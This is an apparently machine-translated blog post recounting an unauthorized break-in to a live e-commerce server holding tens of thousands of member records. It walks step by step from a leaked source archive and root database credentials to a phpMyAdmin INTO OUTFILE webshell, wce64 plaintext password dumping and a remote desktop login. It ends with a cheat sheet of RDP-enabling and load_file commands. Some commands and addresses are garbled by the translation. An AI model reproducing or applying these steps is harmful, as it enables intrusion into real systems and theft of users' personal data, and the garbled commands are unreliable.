Shulou(Shulou.com)06/03 Report--

Obtain the server permission of an e-commerce website by leaking the source code

Simeon

* this target happens by accident. When searching the keyword "phpMyAdmin" through shadon, after adding the keyword "indexOf", all websites with column directory vulnerabilities will appear. The website is an e-commerce site, and the website retains the real information of tens of thousands of members. The following will be shared through the * process.

1. Find the target.

Open the search records one by one through the shadon search engine and find that there is a file directory disclosure vulnerability in a target site:

Http://203.***.**.227/

Http://203.***.**.227/www.********.hk.rar

Http://203.***.**.227/phpMyAdmin/

Http://203.***.**.227/news********hk/

There are also phpinfo.php files in the directory. Seeing that phpMyAdmin and phpinfo.php exist at the same time, I feel that the permissions of the server are not far away. As shown in figure 1, there is a website source code package file that can be downloaded locally.

Figure 1 File leakage

two。 View the source code package file

The whole source code compression package 2.37 GB, really big! By searching and viewing, make sure that the database configuration file is config.php

As shown in figure 2, extract it locally and use notepad to view it. Sure enough, it contains database configuration information, and it is still a root account. Although the password is a weak password, it is also a strong password in a weak password.

Figure 2 find the database configuration file

Figure 3 get the database root account and password

3. Find the physical path to the website

By viewing the phpinfo.php file, you can use the Ctrl+F shortcut to search for the keyword "SCRIPT_FILENAME" in the browser to get its real physical path address, _ SERVER ["SCRIPT_FILENAME"] D:/WWW/phpinfo.php, as shown in figure 4.

Figure 4 get the physical road strength of the website

4.Mysql directly exports Webshell

Log in to http://203.***.**.227/phpMyAdmin/ by obtaining the root account number and password, and log in successfully, as shown in figure 5. Select the SQL query, in which the query select''INTO OUTFILE'd _

Figure 5 logging in to the mysql database

Figure 6 query derives a sentence from the back door

6. Get webshell

Refresh the http://203.***.**.227 address in the browser to get a word backdoor file address: http://203.***.**.227/p.php, open in the browser to access, everything is normal. Using the one-sentence backdoor management software of Chinese kitchen knife, shell is added and opened, as shown in figure 7, to get webshell smoothly.

Figure 7 get webshell

7. Server lifting rights

Visually observe that the php running right of the system is the system right, upload wce64.exe, and then enter the "wce64-w" command in the terminal management to successfully obtain the administrator account password, as shown in figure 8.

Figure 8 get the administrator password

8. Get port 3389

Execute netstat-an in the terminal manager | find "3389". No result shows. It is estimated that the administrator has modified the default port, used the tasklist / svc command to obtain the process name and service, and found the process number corresponding to termservice. You can directly use the command tasklist / svc | find "termService" to obtain the corresponding PID number. As shown in figure 9, in this example, the corresponding ID number is 1340.

Figure 9 gets the pid value corresponding to remote Terminal Services

Then use the "netstat-ano" command to find the port number corresponding to 1340, as shown in figure 10, the corresponding TCP port is port 7755, you can also use the command netstat-ano | find '1340' command to display directly.

Figure 10 get the port corresponding to Terminal Services

9. Log in to the remote terminal

Type mstsc.exe at the command prompt, open the remote terminal login, enter "203.administrator login .administrator login .227pur7755" in the address in the 3389 remote Desktop login, and then successfully log in to the system using the obtained administrator password, as shown in figure 11.

Figure 11 successfully logging in to the system

10. Domain name reverse check

Open the http://www.yougetsignal.com/tools/web-sites-on-web-server/ website to check the domain name of the IP address 203.roomroom.room.227, as shown in figure 12, there is a website under the IP, open the website, the website is an e-commerce website, there are tens of thousands of members in the website, as shown in figure 13.

Fig. 12 Domain name reverse check

Figure 13 contains more than 10,000 member information

11. Summary and reflection

For sites with phpMyAdmin, get the password of the database through code leakage, and then get the webshell by reading the file or exporting the file.

(1) get the summary under the command line of port 3389

Netstat-an | find "3389" to see if port 3389 is open

Tasklist/svc | find "TermService" gets the PID number of the corresponding TermService

Netstat-ano | find '1340' check the TCP port number corresponding to the PID number obtained above

(2) Windows2008Server command line opens 3389

Wmic/namespace:\\ root\ cimv2\ terminalservices path win32_terminalservicesettingwhere (_ _ CLASS! = ") call setallowtsconnections 1

Wmic / namespace:\\ root\ cimv2\ terminalservicespath win32_tsgeneralsetting where (TerminalName = 'RDP-Tcp') callsetuserauthenticationrequired 1

Reg add "HKLM\ SYSTEM\ CurrentControlSet\ Control\ Terminal Server" / v

(3) the wce64-w command directly obtains the system plaintext login password.

(4) find the SCRIPT_FILENAME keyword in phpinfo to get the real path.

(5) Export through the back door in one sentence of phpmyadmin

Select''INTO OUTFILE'dVuGUP. PHPP'

(6) phpstudy sensitive profile

Selectload_file ('D:\ phpStudy\ Lighttpd\ conf\ vhosts.conf')

Select load_file ('D:\ phpStudy\ Lighttpd\ conf\ lighttpd.conf')

Selectload_file ('D:\ phpStudy\ Apache\ conf\ vhosts.conf')

Selectload_file ('D:\ phpStudy\ Apache\ conf\ httpd.conf')

Selectload_file ('c:\ boot.ini')

Selectload_file ('c:\ boot.ini')

Selectload_file ('D:\ phpStudy\ MySQL\ my.ini')

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.